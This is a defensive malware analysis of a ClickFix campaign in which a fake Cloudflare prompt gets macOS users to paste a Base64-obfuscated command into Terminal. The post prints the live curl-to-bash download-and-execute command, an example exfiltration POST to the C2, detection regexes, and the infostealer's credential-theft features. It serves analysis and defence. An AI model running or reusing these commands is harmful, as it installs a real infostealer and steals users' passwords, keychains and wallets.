A social engineering technique known as ClickFix has been gaining popularity recently. The attacker creates a fake authentication page mimicking a CAPTCHA or Cloudflare protection check, which prompts the user to run a command directly on their own system: on Windows via the Win + R dialog, on macOS by launching Terminal through Spotlight (⌘ + Spacebar).

If the user follows the instructions, the system is typically compromised by malware.


During a routine session on my iPad, I came across a page displaying an authentication window visually identical to a legitimate Cloudflare prompt:

[Image: fake Cloudflare verification window]

After interacting with the window, the page prompted me to perform the following steps:

  1. Press ⌘ + Spacebar to open Spotlight
  2. Type Terminal and press Enter
  3. Paste and run the command displayed on the page

I recognized the command as potentially malicious, saved it for analysis, and did not run it.


Command Analysis

The captured command had the following form:

echo " Y3VybCAtc0wgIiQoZWNobyAnYUhSMGNITTZMeTl0Wld0dmFXeHpkV2hoY25WdExtTnZiUzlqYkM5cGJtUmxlQzV3YUhBPScgfCBiYXNlNjQgLWQpIiB8IG5vaHVwIGJhc2ggJg==" | base64 -d | bash

The command decodes the Base64-encoded string and passes the result to the bash interpreter. Decoding the first layer gives us:

curl -sL "$(echo 'aHR0cHM6Ly9tZWtvaWxzdWhhcnVtLmNvbS9jbC9pbmRleC5waHA=' | base64 -d)" | nohup bash &

This is another layer of Base64—this time an encoded URL. The $(...) substitution decodes the inner string and inserts the result as the URL argument of curl -sL, which downloads the remote script; the output is then run in the background via nohup bash &. After decoding the second layer, we obtain the final form of the payload command:

curl -sL https://mekoilsuharum.com/cl/index.php | nohup bash &

To analyze the payload without risk of infection, I modified the command so that the script is only downloaded without being executed:

curl -sL https://mekoilsuharum.com/cl/index.php > payload.applescript
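The two decoding steps above can be automated so that a captured ClickFix command is unwrapped without ever being executed. The following is an added example written for this write-up, not a tool from the original post: it peels the outer echo "..." | base64 -d | bash wrapper and any inline $(echo '...' | base64 -d) substitutions, tolerates whitespace that line wrapping may have inserted into the Base64, and reports the URLs and the download-and-execute pattern found in the final stage. The input is the exact command captured above; the function and pattern names are this example's own.

```python
import base64
import re

# The command captured from the fake Cloudflare page, as quoted in the write-up
# (including the stray space that line wrapping inserted into the Base64).
CAPTURED_COMMAND = (
    'echo " Y3VybCAtc0wgIiQoZWNobyAnYUhSMGNITTZMeTl0Wld0dmFXeHpkV2hoY25WdExtTnZiUzlq'
    'YkM5cGJtUmxlQzV3YUhBPScgfCBiYXNlNjQgLWQpIiB8IG5vaHVwIGJ hc2ggJg==" | base64 -d | bash'
)

DECODE = r"base64\s+(?:-d|-D|--decode)"
# Base64 payload, optionally quoted; whitespace is allowed so wrapped text still matches.
B64 = r"""(["']?)\s*([A-Za-z0-9+/=\s]+?)\s*\1"""
# Outer wrapper: echo "<b64>" | base64 -d | bash   (the whole next stage is encoded)
OUTER_RE = re.compile(r"echo\s+" + B64 + r"\s*\|\s*" + DECODE +
                      r"\s*\|\s*(?:nohup\s+)?(?:ba)?sh\b")
# Inline substitution: $(echo '<b64>' | base64 -d)   (one argument is encoded)
INLINE_RE = re.compile(r"\$\(\s*echo\s+" + B64 + r"\s*\|\s*" + DECODE + r"\s*\)")
URL_RE = re.compile(r"""https?://[^\s"'|)<>]+""")
DOWNLOAD_EXEC_RE = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:nohup\s+)?(?:ba)?sh\b")


def _decode(blob: str) -> str:
    """Decode Base64 after stripping whitespace and restoring any missing padding."""
    blob = re.sub(r"\s+", "", blob)
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-8", errors="replace")


def unwrap(command: str, max_layers: int = 10) -> list:
    """Return every stage from the captured command down to cleartext. Executes nothing."""
    stages = [command]
    current = command
    for _ in range(max_layers):
        m = INLINE_RE.search(current)
        if m:  # resolve $(echo ... | base64 -d) in place
            current = current[:m.start()] + _decode(m.group(2)) + current[m.end():]
            stages.append(current)
            continue
        m = OUTER_RE.search(current)
        if m:  # the decoded text is the next stage
            current = _decode(m.group(2)).strip()
            stages.append(current)
            continue
        break
    return stages


def extract_urls(text: str) -> list:
    """All http(s) URLs present in a stage."""
    return URL_RE.findall(text)


def downloads_and_executes(text: str) -> bool:
    """True when curl/wget output is piped straight into a shell."""
    return DOWNLOAD_EXEC_RE.search(text) is not None


def triage(command: str) -> dict:
    """Summary a responder can attach to a ticket: stages, URLs, execution pattern."""
    stages = unwrap(command)
    return {
        "stages": stages,
        "urls": extract_urls(stages[-1]),
        "download_and_execute": downloads_and_executes(stages[-1]),
    }


if __name__ == "__main__":
    result = triage(CAPTURED_COMMAND)
    for i, stage in enumerate(result["stages"]):
        print(f"stage {i}: {stage}")
    print("urls:", result["urls"])
    print("download-and-execute:", result["download_and_execute"])
```

The final stage keeps the double quotes that surrounded the $(...) substitution, so it reads curl -sL "https://…" rather than the unquoted form shown above; the URL and behaviour are the same. The recovered URL can then be fetched with output redirected to a file, as done above, or handed to a sandbox.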

Payload Analysis

The downloaded file turned out to be a full-fledged infostealer written in AppleScript, targeting macOS systems. I uploaded the script to VirusTotal – analysis results here.

Modules

1. Data collection from browsers

  • Steals cookies, login credentials, form history, and password databases from Chromium-based browsers (Chrome, Brave, Edge, Vivaldi, Opera, Arc, etc.) and from the Firefox family of browsers (Firefox, Waterfox).
  • Targets over 200 browser extension IDs, primarily crypto wallets—MetaMask, Phantom, Coinbase Wallet, and others.

2. Cryptocurrency wallet theft

  • Desktop wallets: Electrum, Exodus, Atomic, Ledger Live, Coinomi, Wasabi, Monero, Bitcoin Core, and others.
  • Browser wallets: via IndexedDB and Local Extension Settings.

3. File exfiltration

  • Scans the Desktop and Documents folders and targets the following file extensions: .txt, .pdf, .docx, .wallet, .key, .keys, .kdbx.
  • Steals the Apple Notes database (NoteStore.sqlite) including media attachments.
  • Steals Safari cookies and macOS Keychain (login.keychain-db).

4. Obtaining the System Password

  • If the account has no password, it attempts to extract the Chrome encryption key using the security utility.
  • If the account is password-protected, it displays a fake system dialog titled “macOS Protection Service” and repeatedly prompts the user to enter the password. It verifies the password using dscl authonly.

5. Data exfiltration

  • It compresses the collected data using the ditto tool into the /tmp/alego.zip archive.
  • It sends the archive via an HTTP POST request to the C2 server.
  • After successful transmission, it deletes all temporary files and traces of its activity.

6. Update mechanism (commented out)

  • The script contains the toast() function, which is capable of downloading and replacing any application in /Applications/. It likely serves to ensure persistence or to trojanize legitimate software. In the analyzed version, this function is disabled.

Network Infrastructure

Domain / path                            Purpose
mekoilsuharum.com/cl/index.php           Distribution server – hosts the payload
api.uterimoxis.com/api/data/receive      C2 server – receives exfiltrated data (HTTP POST)
api.uterimoxis.com/api/health            C2 server – connection check endpoint
gamma.api.uterimoxis.com                 Dropper/update endpoint (commented out)

Every request to the C2 server contains the header X-Bid: f48fbe39836779cadbf148b5952919fd, which serves as a campaign or bot identifier.


Tactics, Techniques and Procedures (TTPs)

The observed behaviour maps to the following MITRE ATT&CK techniques:

ID           Title                                         Description
T1555.001    Credentials from Password Stores: Keychain    Extracting passwords from the macOS Keychain
T1539        Steal Web Session Cookie                      Theft of session cookies from browsers
T1528        Steal Application Access Token                Theft of crypto wallet tokens
T1056.002    Input Capture: GUI Input Capture              Fake system dialog designed to steal the password
T1041        Exfiltration Over C2 Channel                  Sending data over HTTP to the C2 server
T1560        Archive Collected Data                        Compressing data prior to exfiltration

Indicators of Compromise (IOCs)

Files and paths:

  • /tmp/alego.zip
  • /tmp/stravy/
  • ~/.pwd
  • ~/.username

Network:

  • uterimoxis.com
  • mekoilsuharum.com

Processes / Behavior:

  • AppleScript dialog titled “macOS Protection Service” requesting the system password
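The IOCs and behaviours listed above translate directly into detection logic. The following is an added example, not part of the original analysis: a small rule set keyed on the indicators from this write-up (the Base64-to-shell lure, curl piped into bash, the "macOS Protection Service" dialog, dscl -authonly, the /tmp staging paths, the X-Bid header and the two domains), run over a few constructed process-execution and DNS log lines. The log format, the user name jdoe and the rule names are this example's own; the ATT&CK IDs T1204 (User Execution) and T1105 (Ingress Tool Transfer) are real techniques that are not in the table above, the rest are taken from it.

```python
import re

# (rule name, ATT&CK technique or None, pattern). Indicators are those reported in
# the write-up; T1204 and T1105 are ATT&CK IDs not listed in its TTP table.
RULES = [
    ("decode_to_shell", "T1204",
     r"base64\s+(?:-d|-D|--decode)\s*\|\s*(?:nohup\s+)?(?:ba)?sh\b"),
    ("curl_pipe_shell", "T1105",
     r"\b(?:curl|wget)\b[^|]*\|\s*(?:nohup\s+)?(?:ba)?sh\b"),
    ("fake_password_dialog", "T1056.002", r"macOS Protection Service"),
    ("dscl_authonly", "T1056.002", r"\bdscl\b.*-authonly"),
    ("staging_archive", "T1560", r"/tmp/alego\.zip|/tmp/stravy\b"),
    ("c2_header", "T1041", r"X-Bid:\s*f48fbe39836779cadbf148b5952919fd"),
    ("ioc_domain", None,
     r"\b(?:[a-z0-9-]+\.)*(?:uterimoxis|mekoilsuharum)\.com\b"),
    ("credential_dotfiles", None,
     r"(?:~|/Users/[^/\s]+)/\.(?:pwd|username)\b"),
]
COMPILED = [(name, tech, re.compile(pat, re.IGNORECASE)) for name, tech, pat in RULES]

# Constructed sample log: "<timestamp> <event type> <detail>". These lines are
# invented for the example and mirror the behaviour described in the analysis.
SAMPLE_LOG = [
    '2025-01-01T10:00:01Z exec bash -c "echo ZWNobyBoaQo= | base64 -d | bash"',
    '2025-01-01T10:00:02Z exec bash -c "curl -sL https://mekoilsuharum.com/cl/index.php | nohup bash &"',
    "2025-01-01T10:00:02Z dns query mekoilsuharum.com",
    "2025-01-01T10:00:05Z exec osascript -e 'display dialog \"Enter your password\" "
    "with title \"macOS Protection Service\" with hidden answer'",
    "2025-01-01T10:00:09Z exec dscl . -authonly jdoe [redacted]",
    "2025-01-01T10:00:20Z exec ditto -c -k /tmp/stravy /tmp/alego.zip",
    '2025-01-01T10:00:21Z exec curl -X POST -H "X-Bid: f48fbe39836779cadbf148b5952919fd" '
    "--data-binary @/tmp/alego.zip https://api.uterimoxis.com/api/data/receive",
    "2025-01-01T10:00:22Z exec cat /Users/jdoe/.username",
    "2025-01-01T10:00:30Z exec ls -la /tmp",
    "2025-01-01T10:01:00Z dns query example.com",
]


def scan(lines) -> dict:
    """Map 1-based line number -> sorted rule names, for every line that matched."""
    hits = {}
    for idx, line in enumerate(lines, start=1):
        matched = sorted(name for name, _tech, rx in COMPILED if rx.search(line))
        if matched:
            hits[idx] = matched
    return hits


def techniques(hits: dict) -> list:
    """Sorted ATT&CK technique IDs implied by the rules that fired."""
    by_name = {name: tech for name, tech, _pat in RULES}
    return sorted({by_name[n] for names in hits.values() for n in names if by_name[n]})


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for line_no, names in found.items():
        print(f"line {line_no}: {', '.join(names)}")
    print("techniques:", techniques(found))
```

Rules such as decode_to_shell and fake_password_dialog are behavioural and survive a change of domains or header values, while ioc_domain and c2_header are campaign-specific and should be refreshed as the infrastructure rotates; a process-execution line that matches decode_to_shell from a Terminal parent is the point at which the ClickFix lure can still be interrupted, before the payload runs.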

Conclusion

This campaign combines social engineering (ClickFix), multiple layers of Base64 encoding for obfuscation, and a sophisticated AppleScript infostealer. The result is an attack that is difficult for the average user to detect and, if successful, provides the attacker with complete access to browser data, crypto wallets, files, and the system password.

If you see a prompt to run a command in Terminal as part of "verification," it is always an attack. No legitimate service requires this procedure.


Note: I used AI exclusively for structural design and consultation recommendations while writing this article. The research and content themselves are the result of my own work.